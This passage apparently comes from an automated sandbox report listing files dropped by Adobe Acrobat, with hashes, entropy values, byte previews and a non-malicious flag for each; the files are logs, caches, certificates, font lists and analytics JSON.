                                                                                    SSDEEP:96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEV1Hzz1:wshFT0h7cZb2EVKZPEANcGIK5EV1Tz1
                                                                                    MD5:37AF7AF203E398235BBF2A9BC51F6D6B
                                                                                    SHA1:86D3E349B77AF31295923FB0457D3200CF58DFE1
                                                                                    SHA-256:BD6DE5BE924976E1577DB98CD12204F500B09685783EFCA7CF181AAD928093E9
                                                                                    SHA-512:4B5E3006DEA51A2393F35CB86E73A68E6D2A55BBF260D78CE06345EF5B46AB9708FFA3456885B23238A1954A7A61F52971087B68D3D39D34E9F530CF23165619
                                                                                    Malicious:false
                                                                                    Preview:*...#................version.1..namespace-#..o................next-map-id.1.Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/.0..QRr................next-map-id.2.Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/.2%e.o................next-map-id.4.Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/.3nU..^...............Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/"..C^...............Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/....a...............Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.+;|a...............Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/....o................next-map-id.5.Pnamespace-10b75d2f_11e7_4fa3_ae23_
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):319
                                                                                    Entropy (8bit):5.191716957548051
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7kwQ+q2PFi2nKuAl9OmbzNMxIFUt8O/gZmw+Of/HwQVkwOFi2nKuAl9OmbzNMFLJ:7kIvdZHAa8jFUt8O4/+OXT5wZHAa84J
                                                                                    MD5:DF98B3556B2C8A10E4C6EBA316D0B601
                                                                                    SHA1:2E484608D74753F39FEE959F2A1830CAE31D4B60
                                                                                    SHA-256:0F01B109C31BC3E4C164E78DD8A0AE2E7314D4A60C916A7C418EE629074882BC
                                                                                    SHA-512:67C3C7CC62B0E42EA25E2F8263DFED5D7E207E86061089B557A1E73322640AD621B4BFE6348313C5E1D3C83A1558CA2276FF60397F007BADA8DF941FD7A6DFD1
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-02:38:24.039 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-02:38:24.040 b88 Recovering log #3.2024/12/17-02:38:24.041 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):319
                                                                                    Entropy (8bit):5.191716957548051
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7kwQ+q2PFi2nKuAl9OmbzNMxIFUt8O/gZmw+Of/HwQVkwOFi2nKuAl9OmbzNMFLJ:7kIvdZHAa8jFUt8O4/+OXT5wZHAa84J
                                                                                    MD5:DF98B3556B2C8A10E4C6EBA316D0B601
                                                                                    SHA1:2E484608D74753F39FEE959F2A1830CAE31D4B60
                                                                                    SHA-256:0F01B109C31BC3E4C164E78DD8A0AE2E7314D4A60C916A7C418EE629074882BC
                                                                                    SHA-512:67C3C7CC62B0E42EA25E2F8263DFED5D7E207E86061089B557A1E73322640AD621B4BFE6348313C5E1D3C83A1558CA2276FF60397F007BADA8DF941FD7A6DFD1
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-02:38:24.039 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-02:38:24.040 b88 Recovering log #3.2024/12/17-02:38:24.041 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                    Category:dropped
                                                                                    Size (bytes):65110
                                                                                    Entropy (8bit):0.9206466611022782
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:FMM8vQ8MMMMEMMMMHMTel8ikV1lM9BM3YIQYZOzMVMIOBMMjXMLM4OM76MMMMMMQ:8BSOb
                                                                                    MD5:014B2B0028CE183DA972335E68A9E6B4
                                                                                    SHA1:065580B02404C4F7DDBDCF62C6624D7D42EA986F
                                                                                    SHA-256:D444759DBF2ACF2C384E91624AFD86270C4E63C00A509E2366DD695DE831AD68
                                                                                    SHA-512:96B179D6357443E5DBC430FEFE2E0426D6A67D53E20E982F46949500B2FA8ED62D1F60925A9987D9238609D79E8B7F04A08CDF38FA840149BD757C24A8844FD3
                                                                                    Malicious:false
                                                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                    Category:dropped
                                                                                    Size (bytes):86016
                                                                                    Entropy (8bit):4.43897417249588
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:yejci5GyiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0iurVgazUpUTTGt
                                                                                    MD5:8835FF3B2E15F3C402C35755644B08C2
                                                                                    SHA1:06817EEEA1D09CA870656E46C09338C1E4B8EF66
                                                                                    SHA-256:778FA6444A4B755FB09E73EF3B38E2491226EEECB6DAB1FEC8DB6FB541A8D732
                                                                                    SHA-512:634F3B120BF9ACDAE72BB0DC8B7983460CDFD753C9E7161F60A151D71CF1D0268C0A69086EDD874892B4559A2096AB78F3032C96CAC24D842D08F086ED3D898C
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite Rollback Journal
                                                                                    Category:dropped
                                                                                    Size (bytes):8720
                                                                                    Entropy (8bit):3.7772953556904296
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:7MOXp/E2ioyVhioy5oWoy1CUoy1dKOioy1noy1AYoy1Wioy1hioybioyVoy1noyy:7RXpjuhJgXKQAOb9IVXEBodRBkf
                                                                                    MD5:FA23546636861AC38939979F18A94230
                                                                                    SHA1:F6232098E76B05DC0BF3B0F5066E63768CAA879C
                                                                                    SHA-256:304AC9A275A2245484AA7A3C8E019904732D17F5F12AF3BC46E2DFCC875AF2FD
                                                                                    SHA-512:2977FC1FAB793FC2FD015D7D3FF742FEB1E19A9D2494DBE0C4D233099BF66D42D00B74C746C73E3F3ADC8260BA9E8221C56D71774D3FCD410423B2B4AFFC4BA8
                                                                                    Malicious:false
                                                                                    Preview:.... .c.......P...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:Certificate, Version=3
                                                                                    Category:dropped
                                                                                    Size (bytes):1391
                                                                                    Entropy (8bit):7.705940075877404
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                    Malicious:false
                                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):71954
                                                                                    Entropy (8bit):7.996617769952133
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                    Malicious:false
                                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):192
                                                                                    Entropy (8bit):2.7673182398396405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:kkFklDtNZhfllXlE/HT8kh0/h1NNX8RolJuRdxLlGB9lQRYwpDdt:kKq6T8oURNMa8RdWBwRd
                                                                                    MD5:195D93B35CC81C5FA61DFB530203E5FA
                                                                                    SHA1:5A2F376DB950C96BD99B81C82E220898333E8D92
                                                                                    SHA-256:443272098BACAFBB4013451AB73B2AC10A960EE6362E3DA99377AD4A6786A35E
                                                                                    SHA-512:26873EA71DD72D25D4E16A35259C3E1EE54F1551E409E105FE6575D6892631C83618B5331BD3BAD4715C9E38F1DB06B1F326121044ED1134C14CCADD1C3E7732
                                                                                    Malicious:false
                                                                                    Preview:p...... ..........E.VP..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):3.247897867253901
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKnnD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:fnaDImsLNkPlE99SNxAhUe/3
                                                                                    MD5:A2CC34E4D23C16ADE51397AA991D4602
                                                                                    SHA1:B7270BE371ABD0355AFD0D22C66D8952D46263D7
                                                                                    SHA-256:76A2D70A1A4D4AA49DC97E1F5203708BB164F8708B3C346CF57FFEC24F93F423
                                                                                    SHA-512:A2B10716AEF721BCCF432D68F76B6EE5977E73F0BB901122582592A4FA14E190E1DF8D7CBFF5DBEA3DD59A9F085A28F0C4D409EF27EAEBA0EED2132E26FA9403
                                                                                    Malicious:false
                                                                                    Preview:p...... ..........*.VP..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):1233
                                                                                    Entropy (8bit):5.233980037532449
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):1233
                                                                                    Entropy (8bit):5.233980037532449
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):1233
                                                                                    Entropy (8bit):5.233980037532449
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):10880
                                                                                    Entropy (8bit):5.214360287289079
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):10880
                                                                                    Entropy (8bit):5.214360287289079
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):295
                                                                                    Entropy (8bit):5.366851992142103
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJM3g98kUwPeUkwRe9:YvXKXx27UTbdfpGMbLUkee9
                                                                                    MD5:D6F6C65ED4718871C1D90EE21B0C838B
                                                                                    SHA1:E081D6105C6F826D0591F6F6C3CB6768C866C89B
                                                                                    SHA-256:D976B4FD97FBEB95266AE0481C0D4367E8FE67F0D157AED7F7192721E0908694
                                                                                    SHA-512:70E84BF5BC756CDF969B372349CD735101727E7F7F7727F43B466C2B3027B70457FDDE327146FF01C9940129B9590B62D6540E5BCA97677821520FB5FBCB0C12
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):294
                                                                                    Entropy (8bit):5.302179356629647
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfBoTfXpnrPeUkwRe9:YvXKXx27UTbdfpGWTfXcUkee9
                                                                                    MD5:7682894A70CCE74F9C684558B3DD344D
                                                                                    SHA1:076F656B8EB39E940F83C3A0F8390590B53A7FE2
                                                                                    SHA-256:10428F1D2233E2949C561226B2B2F1DE780239CD03E09C6A5A41373E24F5FC4D
                                                                                    SHA-512:286BE497FF148504B8AB0FEB548710AD26210C32EC68648527CFF00800F6D623043F0033E4A6D65BDF4BF7AE03AEC30C48B2B04A2ABA5F54FB0038A8FA75B01A
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):294
                                                                                    Entropy (8bit):5.279940427001473
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfBD2G6UpnrPeUkwRe9:YvXKXx27UTbdfpGR22cUkee9
                                                                                    MD5:99859AD2FB3CAE08B9629D845DD676C4
                                                                                    SHA1:CC2C4546D9116F3E87BBB1D3AD47354ACDCA96D6
                                                                                    SHA-256:26DD31E6515BE7B746AAC7988AE582738BD4C8F377056311755E34147BE66097
                                                                                    SHA-512:B13617F610B5146989B37F0322399C2C858DA163C983B89B71F2769900F9F97AAC511CBFC5A64A68502888641996A7638A76B061797F6F736FFA088B100EB21D
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):285
                                                                                    Entropy (8bit):5.34125310925297
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfPmwrPeUkwRe9:YvXKXx27UTbdfpGH56Ukee9
                                                                                    MD5:50524E145D95F05C59B8DF31847B51FB
                                                                                    SHA1:486BCB487F7C3211786A2C2B00D17355F0544CBB
                                                                                    SHA-256:E31B193162250193DD4F69D2FD7B02D9ED337FC39F40D91BD1F0D3E9F19573FD
